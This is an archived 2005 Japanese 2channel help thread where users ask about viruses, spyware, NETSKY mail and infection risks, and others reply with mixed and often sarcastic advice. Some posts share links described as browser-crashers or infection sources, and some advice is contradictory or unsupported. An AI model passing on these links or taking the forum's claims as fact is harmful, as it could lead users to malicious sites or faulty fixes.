2ちゃんに書き込めるんなら調べられるだろうよ。
なんかあったらすぐにウィルスのせいだと思うのやめた方がいいよ。

http://homepage2.nifty.com/winfaq/howtoresetpassword.html#ntpass

>>235,236

アドバイスありがとうございますm(_ _)m

ezwebでウィルスやパソコンetcをキーワードに検索はしたのですが、
それらしいものが見つけられず、
2chに助けを求めてしまいました。

imodeではできると聞いていましたが、
ezで2chができるかさえこれまで知らなかった未熟者です(汗

今までは様々な不具合があっても、
ウィルスではなく自分の不手際やハードの問題でしたので
今回ももちろんまずそれを疑い、
何とかいろいろ試してみましたが、
本当にお手上げだったので最後にウィルスを
考えた次第です。

236のサイトを熟読してみます。
ありがとうございました。

>>235はエボシ

ここ４，５日で１日に３、４通知らないアドレスからNETSKYが入ったメールを受け取ります。
あとＤＡＥＭＯＮメールも来るようになりました。
プロバイダはniftyでOSはXPウィルスソフトはウィルスバスターです。
今まで一度もこんなことが無かったので怖いのですが
原因は自分のアドレスを知ってる人が感染したと考えればいいでしょうか？
NETSKYは受信したメールを開いても添付ファイルを開かなければ大丈夫なんでしょうか？
また、もし感染してた場合どんな事が起こりますか？

すいませんがどなたかアドバイスお願いします。

>>239
あなたのアドレスを知ってる人が感染したんだろうね。
Windows Updateしてないと、セキュリティホール突かれて受信即感染もありうるよ。

>>239
【差出人】WORM_NETSKY【詐称】
http://pc8.2ch.net/test/read.cgi/sec/1080741342/も参照。

とあるサイトに行ったところ急にウイルス警報が鳴り、PCのハードデスクアクセスランプ
が光りっぱなしになりました。
駆除もできず、ランプも光りっぱなしなので再セットアップを試みたのですが、
再セットアップ用ＣＤロムすら受け付けず、再セットアップすらできませんでした。
こんな怖いウイルスあるのですか？
確か種類はワーム系だったように記憶しているのですが・・・
ちなみに、今は別のPCでアクセスしてます。

ご意見をお聞かせください。

>>242
お願いだからスキャンしてよ。オンラインスキャンでもいいよ。

>>242
ご意見
CDブートしてインストールしろよ

>>240-241
ありがとうございます。
updateはこまめにやっているので感染はしてないと思います。
というか、感染していない事を祈るばかりです・・・

>>243>>244
ご返答ありがとうございます。
そのサイトに足を踏み入れた時点でジーとPCのハードデスクアクセスランプ
が光りっぱなしになってしまい、ネット機能はもちろんすべての機能が使用できなく
なってしまいました。できたのは電源を切るくらいです。
（ですからオンラインスキャンもできません。）
再度立ち上げてもそのジーの状態が続いていますし・・・
そこで再セットアップのCDロムを入れたのですが受け付けない（読み込まない）
のです。ハードデスクがｳｲﾙｽに破壊されたのでしょうか？
ＯＳはMEなんですが・・・

ＣＤブート・・・？

ここで解析してもらいたいのですが、うｐろだにウイルスUPするのはやばいですか？
きちんとコメント欄で警告してパス付ZIPでうｐすれば問題ないかな？

>>247
何でパス付ZIPとか知ってるのに解析頼むんだ？
初心者には見えないが

>>247
ν速にカエレ(･∀･)！

>>248-249
聞く場所間違えますた。ｽﾏｿ

【トラックバック来たよ】 (ver. 0.11)
[タイトル] もの凄い勢いで誰かが質問に答えるスレ14766
[発ブログ] 初心者の質問＠2ch掲示板
http://etc3.2ch.net/test/read.cgi/qa/1115973339/l50
( ref= http://etc3.2ch.net/test/read.cgi/qa/1115973339/l50 )

[＝要約＝]
調べるのがめんどくさい初心者はなんでもかいとけ！
知ってたら即、答えるし、知らんかったら知らんと書く。
検索なんかクソでも喰っとけ！
教えて君以外は逝ってヨシ！

【鉄の掟】
一、かぶっても泣かない。
一、出された質問は残さず答える。
一、マンモス村田のギャグには大爆笑する。

■質問者へ
なかなか回答がこない場合は「<a href="../test/read.cgi/qa/1115973339/2" target="_blank">>>2</a>」のように質問を書いた場所の
左側の番号を半角で書き込んで回答を催促してみましょう。

■参考
本スレURL保存所６ 　　　　　　　←スレを立てたら報告はこちら
http://jbbs.livedoor.jp/bbs/read.cgi/computer/490/1108136298/
もの質外部避難所12　　　　　　←鯖が�d�jときはこちらに集合
http://jbbs.livedoor.jp/bbs/read.cgi/computer/490/1101364883/
物質避難所　３テント目
http://etc3.2ch.net/test/read.cgi/qa/1105598185/

すいませんが　
>>210
の質問に答えていただけないでしょうか？
HDの空きが数GBになってしまってせっぱつまってます。
よろしくご教示ください。

>>252
スパイウェアは調べたの？やってだめだったら
コントロールパネル→システム→システム復元を無効
にしてもう一度削除してみる。

yoursitebarに見せかけてるだけで
どうもyoursitebaじゃないっぽいです。。
いまだにポップアップ出てきます。
素人じゃ説明付きにくいです。
X-Cleanerもやったし。ノートン先生もまったく反応しないし。。

どなたかウィルス＆スパイウェアに詳しくて
回復力に自信のある方、
negativebeats.comでmp3をダウンロードして
このにかかっていただけません？
なんか言ってること回し者っぽいですけど。

でもなんか変ですよ、このウィルスだかスパイウェアだかは。。。

>>254
http://download.forest.impress.co.jp/pub/win/a/adawarese/aawsepersonal.exe
これ使え！アップデート忘れずに

>>253
Spybotでチェックしてスパイウェアはありませんでした。
システム復元を無効にして削除しましたが、やはり再び作成されてしまいます。
他に対処法はありませんか？

もしかしてラバソフトのアドアウェアですかね？
スパイウェアブラスターとスパイボットとアドアウェア
３つとも更新して、後者２つは自分でスキャンして使ってます。

>>257
Ad-awareSEになってるか?

>>256
セーフモードはやってみた？

>>256
http://download.forest.impress.co.jp/pub/win/a/adawarese/aawsepersonal.exe
でもやってみろ

>>259
やってみます。
返信ありがとうございます。

>>257
感染してみた。そのあとAd-awareSEでフルスキャン。
問題ないよ

>>259
Ad-awareSEをインストールして、フルチェックしました。
セーフモードで削除もしました。
しかし、まだファイルが作成されてます･･･

>>263
ウイルスバスターは軽度の症状にはフルスキャンかけても発見できない場合があるから、
C:\WINDOWS\system32　update5440791.logのプロパティ開いて、
直接ウイルススキャンすると発見できる場合がある。
もしもあったらプログラムの追加と削除で変なアプリが無いか探してみな！

もう寝る

http://ex10.2ch.net/test/read.cgi/news4vip/1116003942/46

ネ申ID出現

ThePenis

さっき、Windows2000で作業してたら、見慣れない

WINLOGON.EXEというのがけっこうなCPUとメモリを消費して鎮座していました。
さっそく検索してみると、ウイルスの可能性が・・・
大文字というのも激しく気になる。

レジストリを見る分にはウィルスの感染は無いとは思うんですが、
元々正規のやつもあるらいしので、わけがわかりません。

これって、正規版でも突然立ち上がったりするんでしょうか？

http://tmp5.2ch.net/test/read.cgi/download/1111673858/318

318 名前：[名無し]さん(bin+cue).rar[] 投稿日：2005/05/14(土) 11:01:38 ID:u60jwOCq0
http://www.google.co.jp/search?hl=ja&q=pl217.nas932.te-fukuoka.nttpc.ne.jp:9099
http://www.google.co.jp/search?hl=ja&q=pl217.nas932.te-fukuoka.nttpc.ne.jp:80

「著作権侵害だ、自業自得」とHDDの全ファイルを消去するウイルス
ttp://news.goo.ne.jp/news/internet/it/20050514/iw2005051403-internet.html

スペインのPanda Softwareは11日、トロイの木馬型ウイルス「Whiter.F」を警告した。
脅威レベルは4段階中、下から2番目の“Low”だが、ダメージ度は最も高く評価されている。
Whiter.Fに感染すると、まずCドライブの直下にWXPと呼ばれるテキストファイルが生成される。
このファイルには「You did a piracy, you deserve it（お前は著作権を侵害した、自業自得だ）」と記載されている。
続いて、HDDに保存されたファイルを全てこのファイルに置き換えた上で、
ファイルを全て削除する。このため、感染したPCは機能を停止してしまう。
さらに、ユーザーがツールを使用してHDDの修復を試みても、
置き換えられたファイルのみが回復され、元々のデータを復旧することは不可能だという。

PCを起動していると突然黒画面になり

WARNING!
YOU'RE IN DANGER
あと英語〜〜〜
｜
中略
｜
英語〜〜

となったのですが、コレもウィルスなのでしょうか？
検索してもいまいちでてきません。

>>268
ウイルスっぽい
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_RPCSDBOT.A&VSect=T
http://japan.ahnlab.com/virusinfo/Sec_Vir_view.asp?id=735
>>271
スパイウェアの可能性

>>272
スパイウェアですか!
Spybotとかで削除できそうですね。
ありがとうございます。

>>271
ttp://www.higaitaisaku.com/
↓
このページの上のメニューのHJT DBをクリック
↓
smart-securityで検索
↓
1件該当するものがヒットする

>>274
ありがとうございますorz

>>275
あのさ、その壁紙になったということは今まで
スパイウェアに感染していたんだろ。

ガキは黙ってろや
　　　　　∧＿∧ 　　 　　　　|
　　　 　（　´_ゝ`） 　　　　　　||
　　 ／⌒　　 　⌒ヽ　　　　　|||
　　/ _イ　　　　／⌒＼ 　　　||||
　 （＿＿_つ／ 　　　　＼ 　　|||||
　　　　/　／　　 イ＼ 　 ＼　　/＼
　　　　| 　　　 ／|　 　＼　 ＼∧ │　☆
　　　　＼＿／　 | 　　 　＼＜ 　＞／
　　　　　　 │　 |　　　 ☆　＼∨⌒ヽ
　　　　　　 /　　ﾉ　　　　　ヾ/　´;ﾟ;ё;ﾟ;)
　　　　　 /　 ／　　 　　　 　|>>276/
　　　　 丿 ／　　　　　　　　| /|　|
　　　　（　 （__　　　　　　　 //　| |
　　　　　ヽ＿ﾉ 　　　　　　Ｕ　 .Ｕ

>>268>>271
おまいら　とりあえず>>1な

>>268
ttp://www.nai.com/japan/security/virS2003.asp?v=W32/Spybot.worm.lz

>・WINDOWS SYSTEM32ディレクトリに、24,064バイトのwinlogin.exeファイル（注：winlogon.exeは
>正規のWindowsファイルです）、および43,520バイトのyuetyutr.dllファイルが存在します。

http://ntgnma039180.gnma.nt.adsl.ppp.infoweb.ne.jp/
ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
ｗｗｗｗｗｗｗおｋｗｗｗ
ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
おｋｗｗｗ
っっうぇっうぇｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗうはっｗｗｗ

もしかして、これはやばいすか？

【Intel】 ハイパースレッディングに深刻な脆弱性　【入ってる？】　
http://news19.2ch.net/test/read.cgi/newsplus/1116047559/

山田ウイルスに感染したかどうかどうやったらわかるの？
詳しい人、教えて。
症状がわからない。

山田という人に逢いやすくなる

>>282
http://127.0.0.1:80/~ss.jpg
　　　　　　　↑デスクトップが映ったら阿寒

ウイルスセキュリティ2005EX入れてフレッツの速度計測すると入れてない状態よりも
30Ｍbpsも低くなりました。　
速度が犠牲にならない対策ソフトはありませんでしょうか

>>285
そんな便利なモンがあったらみんな使ってる。
セキュリティと利便性とはトレードオフなんだから
ある程度は諦めれ。

大体、速度計測で何十Mbps出たところで事実上10Mbpsあれば
普通に使ってる分には充分だし。P2Pでも使ってれば別だけど。

>>270
これ、同様のウイルスもっと昔からあるよね。

自分のＩＰアドレスってどうやったらわかるんですか？

>>288
WindowsXPの場合は｢スタート」→「すべてのプログラム」→「アクセサリ」→「コマンドプロンプト」でカーソルの位置からそのままipconfigと入力して[Enter]キー。

>>289
ありがとうございました。山田ウイルスが気になって・・・

>>290
自分のIPと山田ウイルスとなんの関係が？
感染してるか知りたいんだったらhttp://127.0.0.1/かhttp://localhost/で
ブラウザからアクセス出来るか調べりゃいいし。

>>291
自分と同じＩＳＰの山田の書き込みを見るたびビクついてたんで
検索してみようと思ってんですけど・・・関係なかったんですか・・・ｏｒｚ
一応そこにアクセスしてみたんですが何も表示されなかったんで
一安心です・・・ありがとうございました。

http://money3.2ch.net/test/read.cgi/shop/1096906296/574

誰か確認できませんか？

NETSKYに感染して
ウィルスバスターで駆除したんですが
でも重たかったんでリカバリ
まだ重たいorz
で今日ウィルス検索しても何も検出せず
スパイウェアもなし
しかもメールの送受信もなぜかできない・・・
あと送受信しようとして失敗したときに
Outlook Express閉じるといっそう重たくなるんです・・・
OSはXP、セキュリティソフトはウィルスバスターです

ウイルスバスターは初期設定の関係でNortonの三倍は重いと知り合いがいってました。

>>295
おまいはその知り合いの言うことは全て信じるんだな。

>>291
「サーバーが見つかりません」って出れば感染してないの？
http://localhost/の方を試したが。

>>297
おーい！
LOCALHOSTを偽装したサイトもあるから、
あんま気軽にｕｒｌ踏むのやめれ。

たとえば

　　localhost.de　lokalhost.info　lokalhost.de locaihost

とか。間違って踏んだら地獄見ますし、紹介してる人も
間違って打ったら、もろブラクササイト誘導になるので
気をつけてください。

Ｍｓｃｏｎｆｏｇで開いたシステム構成ユーティリティで、チェック外しても起動時に、
いつのまにまた元に戻っちゃう物は、どうやって消すのでしょうか？

>>300
そいつを復活させてる大元から消す
つか、具体的に何が復活するのさ？

>300
回答ありがとうございます。
ｐ2ｐnetwork.exeとかいうやつです。
やたらと、ネットワークに繋がろうとしてくれてます・・・

消したいのですが、コマンド欄にはファイル名だけで・・・
場所欄のＨＫＣＨ\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
って、どこになるのでしょう？

プロセスに「xxlbou.exe」ってのがあるんだけど、これってウイルスなの？
終了するとまた別の名前で起動するのだが、これって何？
念のためファイルのバージョン情報をば
ファイルバージョン：1, 0, 7, 1
会社名：TODO: <Company name>
言語：英語 (米国)
製品バージョン：0, 0, 7, 0
製品名：TODO: <Product name>

W32.HLLW.Purolは削除しても良いんですか？

>>302
まあ、特に実害が無いなら放っておいていいんじゃないの？
気になるなら、ウイルス対策ソフトとファイアーウォールソフト入れなさい。

ウイルス対策ソフトはどれが一番優れてるの？
有名どころはノートン、ウイルスバスター、マカフィーあたりかな？
玄人の方、教えて下さい。

ウィルスセキュリティ2005EX をおすすめする。安いヨ

>>306
何も入れないのをお奨め
完璧だからね　w

73 名前： 動け動けウゴウゴ２ちゃんねる 投稿日： 2005/05/15(日) 19:29:59 ID:2QSt/S9K0
質問です。 
ウイルス対策ソフトは一般的にどれが一番優れてるの？ 
有名どころはノートン、ウイルスバスター、マカフィーあたりかな？ 
玄人の方、教えて下さい。 

>>307
サンクス！

>>308
なわけないでしょ！からかわないで！！

>>309
うん、それ自分だけど・・・
複数のスレで書き込んじゃいけないの？
別に新スレ立ててるわけじゃないんだし。

>>311
マルチポストはやめましょう
ttp://www.ippo.ne.jp/g/53.html

結果マルチになってしまいますが
別スレで怒られたのでこっちで質問します
初心者板でもスルーされてしまったので何卒お願いします

先程ネットやってたら画面に血しぶきが出てきて
「キャー」という悲鳴と共に「ぬるぽ」という文字が出てきて
電源切ったら再起動出来ない状態になりました
これって前に流行ったキンタマってヤツですか？
今流行りの山田ウィルスとかいうヤツもこんな風になるんでしょうか？

どっちにしても気付かずになんか食らってたんだと思うんですけど
血しぶきが飛ぶタイミングってなんなんですか？
どういう条件が揃うと血飛沫に至るとかってあるんですか？
それともランダムで血飛沫なんでしょうか？
あと、山田はわかんないですけどキンタマだと
ＨＤの中身をぬるぽに書き換えられてしまうようですが
それを回避する方法ってありますかね？
厨質ですみませんが、どなたかよろしくお願いします

>>313
巣に帰れ
http://tmp5.2ch.net/download/

【使用OS】 win98
【WindowsUpdateしてるか】はい
【AntiVirusは何を使っているか】使っていません
【ちゃんとUpdateしてるか】 いいえ
【スキャンした結果（ウイルス名・発見場所）】 ttp://www2.strangeworld.org/uedakana/
【別のオンラインスキャンしたならその結果は】 していません
【症状を具体的に、分かる限りすべて書く】 ブラクラのようによくわからない窓が開いてきて
　　　　　　　　　　　　　　　　　　　　（たぶんメール関係）そしてOutlookExpress
を開いたらチェーンメールみたいのが送られてきていた。
【何をしたらそんなことになったのか】 リンクを踏んでしまった。トロイ？
【これまでにとった措置】何もしていない。
【その他の質問】 メールアドレスがばれていないか心配です。
　　　　　　　　　

>>315
URLをアクセス可能な形で貼りやがって、
質問のフリしたアラシだろおまえ。

>>315
ブラクラの一種。
メールストーム。
たぶんメアドは大丈夫だと思うけど。

昨日からシステムダウンしていた価格コムが報告を出しました
http://www.kakaku.com/

その中で、価格コムのホームページにアクセスした人は
下記のウイルスを取り込んでしまった可能性があると記されています

　　trojandownloader.small.AAO
　　PSW.Delf.FZ

上記はNOD32における呼称のようです。
他のウイルス対策ソフトではどう呼ばれているか、対応しているかなど
情報をいただきたく思います

正確には「一昨日から」でした

Windows XP HE SP2で、メールソフトはOE使ってます。
メールアドレスはいっさい登録してません。
先日メルマガが数件受信された中に、
1通だけ件名もメールアドレスも表示されないメールがあったんですが、どこかにアドレスが漏れてるとか、ウイルスだったとかそういう可能性ってあるんでしょうかね？
今までの受信メールはいつも件名か、メールアドレスかが表示されていたので、何だか気持ち悪くて開く前に削除しちゃったんですが。
・・・厨な質問ですみません。

WinXPを起動するとThe procedure［any］ could not be lcated in the DLL WININET.dll. と表示されてネットに接続できなくなります。 システムの復元しても治らないorz ノートンはなぜか起動できない・・・・ 誰か助けてください！

すいません正確にはIEを使ってネットに接続できないでした

電話口--------ヤフーモデム-----------ＰＣ1　（Ａ接続とします）
　　　　　↑　　　　　　　　　　　　　↑
　　　　電話線　　　　　　　　　　LANケーブル

でネット接続してます。

これを下記のようにＰＣ1のところをウイルス持ちのＰＣ2に置き換えます。

電話口--------ヤフーモデム-----------ウイルス感染済みＰＣ２（B接続とします）
　　　　　↑　　　　　　　　　　　　↑
　　　　電話線　　　　　　　　　　LANケーブル

この接続にした後、再び感染していないＰＣ1をＰＣ２に戻しても
（B接続から再びＡ接続へ戻す）
ＰＣ２からＰＣ1へウイルスは感染しませんか？
感染しませんよね？
モデムやＬＡＮケーブルから感染するはずないですよね？
教えてください。よろしくお願いします。

ウィルスバスターでウィルスチェックをしたら「js kowai.a」と
「joke button.a」というのを検出したんですが、これってどんな
ウィルスなんでしょうか？

>>324
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=JS%5FKOWAI%2EA
ttp://www.trendmicro.com/vinfo/jokes/jokesDetails.asp?JNAME=JOKE_BUTTONS.A

>>325
サンクスです。

【使用OS】 　Windows Me
【WindowsUpdateしてるか】 　してる
【AntiVirusは何を使っているか】 　ウイルスバスター2002
【ちゃんとUpdateしてるか】 　
借り物なのでしてない…ファイアーウォール機能だけ使ってる感じ
【スキャンした結果（ウイルス名・発見場所）】 　しても検出なし（当然）
【別のオンラインスキャンしたならその結果は】
オンラインスキャンが出来ない　
ActiveXを有効にしても「無効になっている」のメッセージが出る
【症状を具体的に、分かる限りすべて書く】
最初名前が「~」のファイルがデスクトップに出た。
以降、立ち上げた後CPUの使用率がすぐ100％になる。
（使っていれば良いが、5分ほど放置すればOUT）
デスクトップの分とあわせて検索して、OEで発見した「~」ファイルを削除。
一ヵ月後また「~」ファイルが出てきたので同じ作業。
あれから出ファイルはてこないがCPU100％の症状は変わらず。
他に、システムの復元が出来ない。オンラインスキャンが出来ないなど。

【何をしたらそんなことになったのか】
リンクアドレスを踏みました
【これまでにとった措置】
上記のほかにスパイボットで検索して検出したスパイウェアを
三つ取り除いた（重たかったけどスパイボットは動いた）
【その他の質問】
もうリカバリするしか無いでしょうか、リカバリ後に元に戻るでしょうか？
（それより随分弄ってるからどうやって復元していいのやら…）

スレ違いだったらごめんなさい。

￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣｣
―――――――――――――‐┬┘
　　　　　　　　　　　 　 　 　 　 　 　 |
　　 　 　 ＿＿＿＿.＿＿＿＿ 　　 |
　　　　　|　 　 　 　 | 　 　 　 　|　　 |
　　　　　|　 　 　 　 | ∧＿∧　|　　 |
　　　　　|　 　 　 　 |（　´∀｀）つ ミ |
　　　　　|　 　 　 　 |/ ⊃　 ﾉ　|　　 | 　 Windows Me
　 　 　 　￣￣￣￣'￣￣￣￣　 　 |

>>323
大丈夫

>>323
問題なし

>>327
＞【AntiVirusは何を使っているか】ウイルスバスター2002
＞【ちゃんとUpdateしてるか】借り物なのでしてない…ファイアーウォール機能だけ使ってる感じ

リカバリーして自分の金でセキュリティソフト買え

>>329>>330
サンクス！
そうだよね〜自分も大丈夫だと思っていたのだけど
ヤフーとPCメーカーに問い合わせたところ、
両者から「感染の可能性は否定できない、しないほうが良い」
と言われた。

そんなことありえるの？
じゃあ、ホテルとかでノートPCでネット回線使えないよね？

>>331
PC1とPC2の間での感染に限定するなら「有り得ない」。
それぞれ個別に考えると、ヤフーモデムがルーター機能持ってなければ
IPマスカレードによる簡易フィルタが無いことになるから、
下手するとネットワーク感染型ワームに引っかかる可能性はあるな。

>>332
お早いレス、ありがとうございます。
せっかく詳しく答えて頂いたのに、
私があまりに無知でよく意味がわかりません。

要するに可能性としてはモデムを媒体として
ＰＣ２のウイルスがＰＣ1に感染する可能性が
あるということでしょうか？

ちなみに
ＰＣ２は現在、ノーガードのセキュリティーでウイルス持ち状態（マカフィ期限切れ）。
ＰＣ1はウイルスバスター最新版にアップデート済みでウイルス皆無の状態です。

もしよろしければもう少しご意見をお聞かせください。

>>333
いや、PC1→PC２の感染は無い。それぞれ別個にネットに繋いだとき
にノーガードだったらという話。
ネットに繋いだだけで感染するワームがあったりするんだけど、
細かいことは省くけど、ルーター入れてるとか、PC１のバスターの
パーソナルファイアーウォールが有効になってるんなら、心配要らない。

>>333
>>332がいっているのはPC2のウイルスがうつるってことじゃなくて、
PC1のガードがしっかりしてないと接続中にインターネット側から
やられる可能性があるってことじゃないの？

それからウイルス飼ってないでさっさと退治しろよw

>>333
> 要するに可能性としてはモデムを媒体として
> ＰＣ２のウイルスがＰＣ1に感染する可能性が
> あるということでしょうか？

この点については
> PC1とPC2の間での感染に限定するなら「有り得ない」。
これで否定してる。

ヤフーモデムの仕様によるが、複数台を繋げるルーター機能を持っていない場合、
電話口--------ヤフーモデム-----------ＰＣ
　　　　　↑　　　　　　　　　　　　　↑
　　　　電話線　　　　　　　　　　LANケーブル
ここで、インターネットからのアクセスをヤフーモデムはPCに通してしまう。
この場合、「悪意を持ったアクセス」も通すことになるので、
PCが何も対策を取っていなければウイルス感染やクラッカーの侵入が可能。

ヤフーモデムが複数台のPCを繋いで
ヤフーモデム---HUB---PC
　　　　　　　　　　　　└---PC
という構成が可能な機能を持っているなら、
いきなり外部（インターネット）から接続しようとする通信は
ヤフーモデムの段階で行き場を失う
（ヤフーモデムがどのPCを宛先とした通信なのか判断できないので通信を破棄する）ため、
悪意を持ったアクセスをある程度遮断できる。
もちろん「ある種の通信を特定のPCに転送する設定」をしていなければ、だけど。

>>334>>335
お優しいお二人、ご回答ありがとうございます。

私がやりたかったのは
ウイルス持ちのＰＣ２をネットに繋げて（>>323の接続Bにして）
avast！という無料アンチウイルスソフトをダウンロードして
ウイルスを駆除しようと考えてたもので・・・

ヤフーのレンタルモデム（Trio1）はルータ機能あるのでしょうかね？

すみません。
私の質問は掛算がわからない子供が微分方程式に挑んでるようなものですね・・・

もしうんざりされてるのならスルーして頂いてけっこうです。
もし気が向いたらご回答ください。

>>336
おお！！書き込んでるうちに新たな回答が！
なんか意味がわかってきました。
手間隙かけて丁寧に説明していただいて誠にありがとうございます。

でも自分のヤフーモデムがどういうタイプ（ルーター付かどうかなど）か
がわからない・・・
やはり掛算がわからない子供のようです・・・
無知はダメですね。

>>336
ヤフーモデムが複数台のPCを繋いで
ヤフーモデム---HUB---PC
　　　　　　　　　　　　└---PC
という構成が可能な機能を持っているなら、

この機能があるのかが不明です。
HUBは蛸足みたいなものですよね？
HUBは使っていないのですが・・・

なんか大丈夫そうだけど、危険なような気もするし・・・
微妙だなあ・・・

みなさんご回答ありがとうございました。

2ちゃんにも優しい方はおられるのですね・・・

>>339
HUB---PC 
　└---PC 

これをやるのがルーターってことね。
んで、Trio1にはルーター機能は無いみたい。
用語とかでわからないことは、まずは
ttp://www.google.co.jp/
で調べる。それでわからなかったらここで聞くと
優しい人が答えてくれる（かもしれない）。

もう一度みなさんのお教えをよく読んでみますと、
PC1のセキュリティがしっかりしてれば、一時的にウイルス持ちのPC2
を繋いでも、感染はしなさそうですね？

違いますかね？

>>340
何度もご親切にありがとうございます。
ってことはTrio1にルーター機能がないからけっこうこの行為（接続B）は危険と言うことですね。
PC難しい・・・

【使用OS】 windowsXP
【WindowsUpdateしてるか】 していません
【AntiVirusは何を使っているか】 　ノートンインターネットセキュリティ
【ちゃんとUpdateしてるか】 　５／１６更新済み

【その他の質問】
上記のような環境で定期的に所有パソコンをチェックしています。
メールはgooのフリーメールを使っていますが
オークションの取引相手から「ウィルスメールが増えた」と連絡がありました。
このような環境で相手先にウィルスメールが届くことはあるのでしょうか。
受信サーバには不信なメールは届いていません。
ご存知の方がいらっしゃればよろしくお願いいたします。

>>343
単に「ウイルスメールの受信が増えた」って事を知らせてくれただけであれば親切に感謝して終わり。

そうでなく、発信元じゃないかと疑われてるのであれば
１．ノートン（定義ファイル最新）で全ドライブ検索。
２．別メーカーのオンラインスキャンで全ドライブ検索。

これで何も検出されなければ、
上のような方法で確認したこと、
別の原因によるものではないかということを
誠意を持って伝える。

それでも相手がゴチャゴチャ言ってくるようなら、
変なのと関わり持っちまったってことだな。

>>344
windows updateもしてないのに、変なのとかかわりっていうより、
自分がかなり変だろ。

>>182と同じ、
10GBのupdate00*.logが15分ごとに生成される状況です。
一応[>>256 >>263]

コマンドのfsutil file createnewを悪用したものらしいのですが、
具体的な対処が思いつきません。
どなたかご教授ください。

【使用OS：Windows XP】
【WindowsUpdate：はい】
【AntiVirus：ウィルスバスター】
　・アップデートしてあります。

>>345
そういやそうだな。
そこは見落としてた。

age

カカクコムに感染したウィルスってアバストさん対応してますか？

antidoteにかけたらウィルスが見つかりました。
74 C:\WINDOWS\Downloaded Program Files\Software_Plugin.exe = ｳｲﾙｽ感染 : Trojan-Downloader.Win32.Swizzor.au

ttp://www.f-secure.co.jp/v-descs/v-descs3/swizzor.htm
ここによると検知したファイルをハードディスクから削除するだけで
駆除できるらしいのですが、
Downloaded Program Filesというフォルダは特殊なフォルダらしく
当該ファイルが見つかりません。
対処をご教示くださいませ。お願いします。

教えてください。


【使用OS】 WIN XP
【WindowsUpdateしてるか】　
している
【AntiVirusは何を使っているか】
期限切れて今は使っていない
【ちゃんとUpdateしてるか】
していない
【スキャンした結果（ウイルス名・発見場所）】
AD-AWAREにてスパイウェアが５０個ほど見つかった。
【別のオンラインスキャンしたならその結果は】
AD-AWAREのみ
【症状を具体的に、分かる限りすべて書く】
会社のＰＣが重くなっているようなきがする。
先輩のＰＣはネットにつながらないこととかが多い。
【何をしたらそんなことになったのか】
多分先輩がエロサイトを頻繁にみてたからorz
【これまでにとった措置】
AD-AWAREで検索→削除

【その他の質問】
システム会社の人がスパイウェアに感染されてることを
教えてくれて、何とか自分でやろうと思ったので、
（有料だと何万もかかるので）AD-AWAREを起動して
検索→削除　をしたのですが、そしたら、システム会社の人に

「スパイウェアにかかっている端末なのですが
そのまま触らずに、普通に使っていてください。
AD-Aware　の削除機能等は絶対に使わないでください。
Windowsが起動しなくなったり、破損する事例が
あります。」

といわれました。

質問の１つは
こういうのは有料でプロにお願いしたほうがいいってことですか？
ということと、

AD-AWAREを起動→検出→削除　では
次の日になると１つぐらいはまた出てしまうのですが･･･
（VALUE なんとかって書いてありました）
防御も大切ですよね？やってないので何かフリーソフトで
いいのがあれば教えてください。

よろしくお願いします。

>>353
SpywareBlaster

>354　ありがとうございます。
それはフリーソフトのことですね？入れてみます！

もうひとつ、AD-AWAREを起動→検出→削除をやってはダメ！って
システム会社にいわれたのですが（自分たちでやるから・・・って）
AD-AWAREのスパイウェアの削除は有料でやってもらったほうがいいんですか？
なんか言いくるめられてるような気がしてならないんですけど・・・

>>355
そんなおまいに簡単な使い方。
SpywareBlaster3.4起動 -> Update -> Protection -> Enabled All Protection
はいこれで終わり。原理的にはレジストリ経由でIEの制限サイトにスパイウェアとかあぶない系のサイトのURLを登録する。
Mozilla/Firefoxにも対応しているからいいよ。さらに詳しく知りたいのならばSpywareBlasterスレのテンプレ見るにだ

常駐させなくても（・∀・）ｲｲ!! SpywareBlaster 7
http://pc8.2ch.net/test/read.cgi/sec/1112251719/

無料アンチウイルスソフトはみなさん何がおすすめですか？
無料のソフトはノートンやウイルスバスターより性能が落ちますよね？
落ちるのなら、どれくらい落ちるのでしょうか？
また、無料で日本語対応してるのってavast！くらいですかね？

>>357
だいたい、大手が８５％〜９０％のカバー率で、
AVGやavastは５０

例のウイルス感染PCの接続の相談の続きです。
みなさん、ご親切にご回答ありがとうございました。

あれから各会社に問い合わせたところ、
ヤフー、PCメーカー�@、PCメーカー�Aの三社は「感染の可能性あり」との見解でした。
ところがウイルスバスターのTREND社は「感染しない」と断言しました。
（それで感染するなら、不特定多数の使うホテルとかのネット
接続サービスが誰も使えないとも言っていた）
う〜ん・・・
誰を信じればいいのか・・・
ウイルスの専門家のTREND社か、それともヤフーや二つのPCメーカーの言うことか・・・
頭は混乱するばかりです。
もしよろしければ、引き続き、だれかご意見をください。

粘着、申し訳ありません。

http://www.imgup.org/file/iup30384.jpg

>>357
avast、AVG、eTrust、AntiVirはほぼ100%
ttp://www.canon-sol.co.jp/security/v_b/pdf/01_VB_Jun03_VBJP.pdf ７/12ページ
ttp://www.canon-sol.co.jp/security/v_b/pdf/03_VB_Aug03_VBJP.pdf　７／１２ページ
ttp://www.canon-sol.co.jp/security/v_b/pdf/09_VB_Feb04_VBJP.pdf　７／１２ページ

>>359
ここでさんざん回答もらってる（めちゃくちゃ丁寧に解説までしてもらって）にも係わらずだ、
あんたはそれが信用出来なくて４社に問い合わせたわけだろう？
つ〜ことはだ、この先ここでどういう回答を得ても、やっぱりあんたは何も信用しないってことだ

納得がいく答えが出るまで自分で調べればいいだろ
回答してくれた方達にすげー失礼だわ、あんた

>>359
個人所有のパソコンじゃないのならあなたがやっている事は、
十分に社内規約に違反しているはず
個人所有でも、社内のネットワークに接続するパソコンなら、それも違反
Ad-awareは、企業ユーズはフリーじゃ認めていないからこれも違反

それに、社内には十分な知識があっ、
判断と責任を持たされている人がいなくて
外部に委託してしまっているようだから、その結果、
何かあったらあんたはクビ

まぁ>>359がクビになろうとどうなろうと、ぶっちゃけ俺等にはどうでもいいんだがな。

>>362
おっしゃる通りですね。
回答してくださった方に失礼でした。
本当に申し訳ありませんでした。
反省します。ごめんなさい。

でも真相はどうなのだろう・・・
TREND社だけが見解が違うのって・・・
皆さんのご意見も説得力があってどれが正しいのかよくわからない・・・

>>365
感染するわけあんめ　バカ
